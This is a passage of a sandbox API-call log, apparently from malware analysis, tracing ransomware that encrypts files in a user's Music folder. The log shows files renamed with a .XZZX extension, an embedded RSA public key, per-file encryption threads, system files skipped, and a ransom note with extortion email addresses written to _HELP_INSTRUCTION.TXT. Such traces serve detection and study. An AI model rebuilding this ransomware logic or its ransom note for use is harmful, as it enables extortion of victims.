lpFindFileData=0x17d320) returned 1 [0241.213] lstrcmpW (lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpString2="..") returned 1 [0241.213] lstrcmpW (lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpString2=".") returned 1 [0241.213] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0241.213] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="ntldr") returned 0x0 [0241.213] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="NTLDR") returned 0x0 [0241.213] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0241.213] StrStrW (lpFirst="B169CAD546C877A0159FDF7F4B675BE8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0241.213] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0241.213] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0241.213] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0241.213] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.213] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B169CAD546C877A0159FDF7F4B675BE8.XZZX" | out: lpString1="B169CAD546C877A0159FDF7F4B675BE8.XZZX") returned="B169CAD546C877A0159FDF7F4B675BE8.XZZX" [0241.213] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12a4 [0241.213] Sleep (dwMilliseconds=0x96) [0241.369] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0241.369] lstrcmpW (lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpString2="..") returned 1 [0241.369] lstrcmpW (lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpString2=".") returned 1 [0241.369] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0241.369] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="ntldr") returned 0x0 [0241.369] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="NTLDR") returned 0x0 [0241.369] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0241.369] StrStrW (lpFirst="C1C4370F268A7D85910C485D2AAB61CD.XZZX", lpSrch="ntdetect.com") returned 0x0 [0241.369] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0241.369] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0241.369] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0241.369] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.369] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C1C4370F268A7D85910C485D2AAB61CD.XZZX" | out: lpString1="C1C4370F268A7D85910C485D2AAB61CD.XZZX") returned="C1C4370F268A7D85910C485D2AAB61CD.XZZX" [0241.369] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12a8 [0241.370] Sleep (dwMilliseconds=0x96) [0241.525] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0241.525] lstrcmpW (lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpString2="..") returned 1 [0241.525] lstrcmpW (lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpString2=".") returned 1 [0241.525] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0241.525] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="ntldr") returned 0x0 [0241.525] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="NTLDR") returned 0x0 [0241.525] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0241.525] StrStrW (lpFirst="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0241.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0241.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0241.525] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0241.525] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.525] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" | out: lpString1="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned="D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" [0241.525] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12ac [0241.525] Sleep (dwMilliseconds=0x96) [0241.680] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0241.680] lstrcmpW (lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpString2="..") returned 1 [0241.681] lstrcmpW (lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpString2=".") returned 1 [0241.681] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0241.681] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="ntldr") returned 0x0 [0241.681] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="NTLDR") returned 0x0 [0241.681] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0241.681] StrStrW (lpFirst="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX", lpSrch="ntdetect.com") returned 0x0 [0241.681] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0241.681] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0241.681] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0241.681] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.681] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" | out: lpString1="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX") returned="FAD3BB6308C4FC66694F337D0D31E0AE.XZZX" [0241.681] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12b0 [0241.681] Sleep (dwMilliseconds=0x96) [0241.836] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0241.836] lstrcmpW (lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpString2="..") returned 1 [0241.836] lstrcmpW (lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpString2=".") returned 1 [0241.837] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0241.837] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="ntldr") returned 0x0 [0241.837] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="NTLDR") returned 0x0 [0241.837] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0241.837] StrStrW (lpFirst="FCD862501902E584E01CEFE81DABC9CC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0241.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0241.837] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0241.837] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0241.837] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0241.837] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FCD862501902E584E01CEFE81DABC9CC.XZZX" | out: lpString1="FCD862501902E584E01CEFE81DABC9CC.XZZX") returned="FCD862501902E584E01CEFE81DABC9CC.XZZX" [0241.837] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12b4 [0241.837] Sleep (dwMilliseconds=0x96) [0241.992] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0241.993] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0241.993] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0241.993] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0241.993] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0241.993] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0241.993] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0241.993] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0241.993] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0241.993] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="Desktop") returned 0x0 [0241.993] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpSrch="DESKTOP") returned 0x0 [0241.993] SetErrorMode (uMode=0x1) returned 0x1 [0241.993] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT") returned 57 [0241.993] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0241.993] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0241.993] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x12b8) returned 0x0 [0241.994] RegQueryValueExW (in: hKey=0x12b8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dca40, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dca40*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0241.994] RegCloseKey (hKey=0x12b8) returned 0x0 [0241.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0241.994] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0241.994] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12b8 [0241.994] CloseHandle (hObject=0x12b8) returned 1 [0241.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0241.994] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0241.994] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0241.994] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0241.994] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0241.994] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0241.994] SetErrorMode (uMode=0x1) returned 0x1 [0241.994] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0241.994] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0241.994] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0241.994] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0241.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0241.994] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0241.994] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0241.995] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0241.995] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="ntldr") returned 0x0 [0241.995] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="NTLDR") returned 0x0 [0241.995] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0241.995] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0241.995] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="Desktop") returned 0x0 [0241.995] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpSrch="DESKTOP") returned 0x0 [0241.995] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0241.995] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 